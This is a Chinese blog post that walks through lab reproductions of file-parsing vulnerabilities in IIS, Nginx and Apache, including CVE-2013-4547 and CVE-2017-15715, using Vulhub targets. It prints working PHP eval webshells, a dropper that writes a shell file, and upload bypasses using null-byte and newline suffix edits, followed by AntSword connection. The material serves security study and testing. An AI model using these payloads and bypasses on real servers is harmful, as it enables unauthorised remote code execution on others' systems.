文件解析漏洞 IIS、Nginx、Apache

于 2024-09-05 20:02:00 发布
阅读量1.2k 收藏 6
点赞数 50
文章标签: nginx apache 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81881972/article/details/141937993
版权

IIS6.X

1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件

2.在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。

3.在外部浏览器中访问windows2003的iis⽹站中的x.jpg 发现asp代码被执⾏

4.将x.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意⽂件会被当做asp⽂件去执⾏.

IIS7.X

步骤⼀:在Windows Server 2008R2中安装IIS后在安装PHPstudy for IIS....

步骤⼆:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉前边的分号(;)并重启....

步骤三:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

把箭头处的对勾取消掉然后确定!

步骤四:将PHP⼀句话木马写到shell.php并更改后缀为shell.jpg上传到⽬标站点...利⽤解析漏洞进行访问

步骤五:蚁剑连接

Nginx

1.nginx_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd nginx/nginx_parsing_vulnerability
docker-compose up -d
docker ps

步骤二:访问靶机并上传 1.jpg 文件,文件内容为GIF82a
<?php @eval($_POST['cmd']);?>

步骤三,访问/uploadfiles/f3ccdd27d2000e3f9255a7e3e2c48800.jpg/.php

步骤四,蚁剑连接

2.CVE-2013-4547

步骤⼀:使⽤以下命令启动靶机并通过浏览器访问靶场⻚⾯.

cd vulhub-master/nginx/CVE-2013-4547x
docker-compose up -d

docker ps

步骤二:访问靶机并上传 1.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀

<?php fputs(fopen("ssh.php","w"),'<?php eval($_POST["cmd"]);?>')?>

步骤三:在hex中将jpg后面第二个空格20改为00,放行

步骤四:访问上传后的文件,抓包

172.16.1.126:8080/uploadfiles/shell.jpg  .php

步骤五:在hex中将jpg后面第二个空格20改为00,放行

步骤六:蚁剑连接

三.Apache

1.apache_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/apache_parsing_vulnerability

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.php.jpg 文件,文件内容为

<?php fputs(fopen("ssh.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

访问/uploadfiles/1.php.jpg

1.php.jpg改为ssh.php

步骤三:蚁剑连接

2.CVE-2017-15715

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/CVE-2017-15715

docker-compose up -d

docker ps

步骤二:访问靶机并上传 1.jpg 文件,文件内容为

<?php @eval($_POST['cmd']);?>,filename为1.php

步骤三:抓包,1.php后面加空格,hex中空格20改为0a

步骤四:放行访问1.php%0A

步骤五:蚁剑连接

你不要在理我了
关注
IIS7文件解析漏洞
willow_liang的博客
10-20 250
环境:win2008+iis7+phpstudy 漏洞复现 原因: test.jpg/.php,所有的文件写成此形式,文件都会按照php解析 条件: 1、php.ini里cgi.fix_ pathinfo=1 2、iis7在Fast-CGl运行模式下 未满足条件的情况下: 满足条件: 漏洞防御 1、配置php.ini里cgi.fix_pathinfo=1, 并重启服务器; 2、在模块映射中勾选请求设置。 ...
第八天Apache解析漏洞IIS 解析漏洞Nginx 解析漏洞文件上传%oo截断
代码审计
03-11 4770
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 文件名后缀就一个%00字节,可以截断某些函数对文件名的判断。在许多语言函数中,处理字符串的函数中0x00被认为是终止符。 例如: 网站上传函数处理xxx.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,遇到%00字符丢弃后面的jpg,文件后缀最终保存的后缀名为xxx.php ...
IIS7.0解析漏洞
qq_40898302的博客
10-17 450
IIS7.0解析漏洞
IIS7漏洞解析
weixin_48182463的博客
10-17 197
举个例子,当php遇到文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxx/bbb.yyy/ccc.zzz”不存在,则会去掉最后的“/ccc.zzz”,然后判断“/aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件“/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。尝试访问phpinfo.png,发现是可以解析的。启动phpstudy。
IIS解析漏洞~ IIS7.漏洞分析
最新发布
weixin_67832625的博客
08-02 378
IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将。文件解析漏洞是由于中间件错误的将特殊格式的文件解析成可执行网页文件(脚本),配合文件上传漏洞进行GetShell的漏洞!php.ini里的cgi.fix_pathinfo=1 开启。
IIS7&7.5解析漏洞
qq_43550342的博客
04-27 305
简介: IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php 文件。 常用利用方法: 将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾 copy xx.jpg/b + yy.txt/a xy.jpg /b 即二进制[binary]模式 /a 即ascii模式 xx.jpg正常图片文件 yy.txt 内容: <?PHPfputs(fop
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2807
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
iis7.5 解析漏洞 php,Web安全 - 解析漏洞
weixin_39665992的博客
03-09 1165
一、原理解析漏洞主要是一些特殊文件ApacheIISNginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。二、Apache1. 多后缀解析一个文件名为 test.x1.x2.x3 的文件Apache会从x3的位置往x1的位置开始尝试解析,如果x3不属于 Apache解析的扩展名,那么Apache会尝试去解析x2, 这样一直往前尝试,直到遇到一个能解析的扩展名为止。例如...
文件解析漏洞总结-IIS
热门推荐
若水斋
08-18 1万+
IIS(Internet Information Services)是微软出品的灵活、安全、易于管理的Web服务器。 在总结过ApacheNginx文件解析漏洞后,现在来总结下IIS文件解析漏洞。默认后缀这其实不是文件解析漏洞,但能达到和文件解析漏洞一样的效果。IIS总是和asp联系在一起。一般而言,asp程序文件的后缀为.asp,但实际上,IIS默认地还会解析其他后缀的文件为asp文件。如
文件解析漏洞大全
scu_hacker博客
01-25 6379
目录 前言 一、apache解析漏洞 二、nginx解析漏洞 2.1nginx<8.03 2.2nginx 0.5,0.6,0.7 <= 0.7.65, 0.8 <= 0.8.37 三、IIS解析漏洞 3.1IIS 5.0/6.0 3.2 IIS 6.0 3.3IIS 7.x 四、windows解析漏洞 4.1​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格 ​​​​​​​4.2上传jsp::DATA文件,windows会...
winserver2008/iis7缓冲区溢出提权0day
09-13
一个很NB的工具。适用于iis7/iis7.5。溢出提权。 webshell提权、本地提权居家、放火必备。
iis7提权工具iis7提权工具
06-10
iis7提权工具iis7提权工具iis7提权工具iis7提权工具iis7提权工具iis7提权工具
IIS7解析漏洞复现
worker___的博客
12-21 3067
首先我们在win7上安装IIS7,控制面板》程序》打开或关闭windows功能,勾选如下信息,尽量勾选多一点防止实验失败 点击确定,稍等 在windows7虚拟机安装phpstudy2018版本,可先在物理机下载压缩包,然后上传到虚拟机,然后解压安装,选择安装地址为C盘下,安装完成后如下 安装完成后我们可以利用一个phpstudy一键搭建好我们的网站,点击切换版本,然后选择php-5.2.17+IIS 然后我们访问一下phpinfo()看看是否搭建成功 如上图证明我们的网站
IIS7.x漏洞原理和复现
qq_35224240的博客
04-22 6485
一、漏洞环境安装 安装IIS7.x 1)打开控制面板–点击卸载程序 2)打开或关闭Windows功能 3)选择相关要打开的功能 点击确认等待几分钟即可 4)在开始出搜索iis,打开IIS Manager 5)在浏览器访问127.0.0.1显示下面页面表示安装成功 安装小皮 phpstudy 小皮是结合上面IIS7用于复现的,用于联动php和IIS的 当然,也可以不装小皮,通过限制CGI来联动PHP 1)点击安装程序 默认下一步 2)安装VC11 下载地址:https://www.php.cn
Web中间件漏洞IIS
d59hao的博客
05-12 227
IIS 是 Internet Information Services 的缩写,意为互联网信息服务,是由微软公司提供的基于运行 Microsoft Windows 的互联网基本服务。最初是 Windows NT 版本的可选包,随后内置在 Windows 2000 、Windows XP Professional 和 Windows Server 2003 一起发行,但在 Windows XP Home 版本上并没有 IIS
一篇了解Java反射
qq_44005305的博客
09-10 62
1.Class也是类,也继承Object类2.Class类对象不是new出来的,而是系统创建的 (都是通过Classloader类创建的)3.每个类的Class类对象,在内存中只有一份,因为类只加载一次。
深入浅出带你学习IIS中间件常见漏洞
郊眠寺
02-16 908
简单总结了一下IIS中间件的常见漏洞以及攻击方法不知道大家学会了没有,文章主要还是讲了IIS解析漏洞的实现方法,有兴趣的小伙伴不妨去搭建一个靶机去测试一下,喜欢本文的小伙伴不妨一键三连支持一下。整理了75个JS高频面试题,并给出了答案和解析,基本上可以保证你能应付面试官关于JS的提问。
ApacheNginxIIS中间件 存在哪些解析漏洞
03-25
ApacheNginxIIS等中间件存在许多不同的解析漏洞,以下是其中一些常见的漏洞: 1. Apache - CVE-2019-0211:存在漏洞可允许攻击者在服务器上执行任意代码 - CVE-2019-0196:存在漏洞可允许攻击者通过目标Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值